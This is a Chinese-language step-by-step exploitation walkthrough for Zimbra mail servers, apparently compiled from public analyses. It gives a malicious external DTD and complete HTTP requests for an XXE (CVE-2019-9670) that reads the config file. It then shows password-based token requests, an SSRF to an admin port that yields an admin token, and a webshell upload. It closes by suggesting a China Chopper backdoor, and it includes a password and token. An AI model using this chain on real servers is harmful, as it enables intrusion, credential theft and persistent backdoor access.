Zimbra

第一步：利用XXE讀取配置文件

 

這裏利用了CVE-2019-9670漏洞來讀取配置文件，你須要在本身的VPS服務器上放置一個dtd文件，並使該文件可以經過HTTP訪問。爲了演示，我在GitHub上建立了一個倉庫，從GitHub上獲取dtd文件。

上圖中用紅框圈起來的就是zimbra帳號的密碼，先記下來之後會用到。

dtd文件內容以下：

1 <!ENTITY % file SYSTEM "file:../conf/localconfig.xml">  
2 <!ENTITY % start "<![CDATA["> 
3 <!ENTITY % end "]]>">  
4 <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>"> 

POST請求包以下：

POST /Autodiscover/Autodiscover.xml HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 436  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<!DOCTYPE Autodiscover [  
        <!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd">  
        %dtd;  
        %all;  
        ]>  
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">  
    <Request>  
        <EMailAddress>aaaaa</EMailAddress>  
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>  
    </Request>  
</Autodiscover>  

第二步：獲取低權限token

從上圖能夠看到已經獲取到token，但該token不是管理員權限的token，暫時記下來之後要用。

POST請求包以下：

POST /service/soap HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 467  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAccount">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>  

第三步、利用SSRF獲取admin權限token

將上一步獲取到了低權限token添加到cookie中，將xmlns="urn:zimbraAccount"修改成xmlns="urn:zimbraAdmin"，在Host字段末尾添加「:7071」，URL中的target要使用https協議。而後發送請求便可得到admin權限的token。

POST請求包以下：

POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1  
Host: mail.****.com:7071  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml  
Content-Length: 465  
Connection: close  
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAdmin">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>  

第四步、上傳webshell

將上一步獲取的admin權限token添加到cookie中，而後上傳webshell。

Webshell路徑爲/downloads/k4x6p.jsp，訪問該webshell時須要在cookie中添加admin_toke。

你能夠利用此webshell在其餘無需cookie便可訪問的目錄裏建立一個可用菜刀鏈接的小馬。

我主要作了一些整理工做，感謝網上各位大佬寫的分析文章。

參考連接：

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd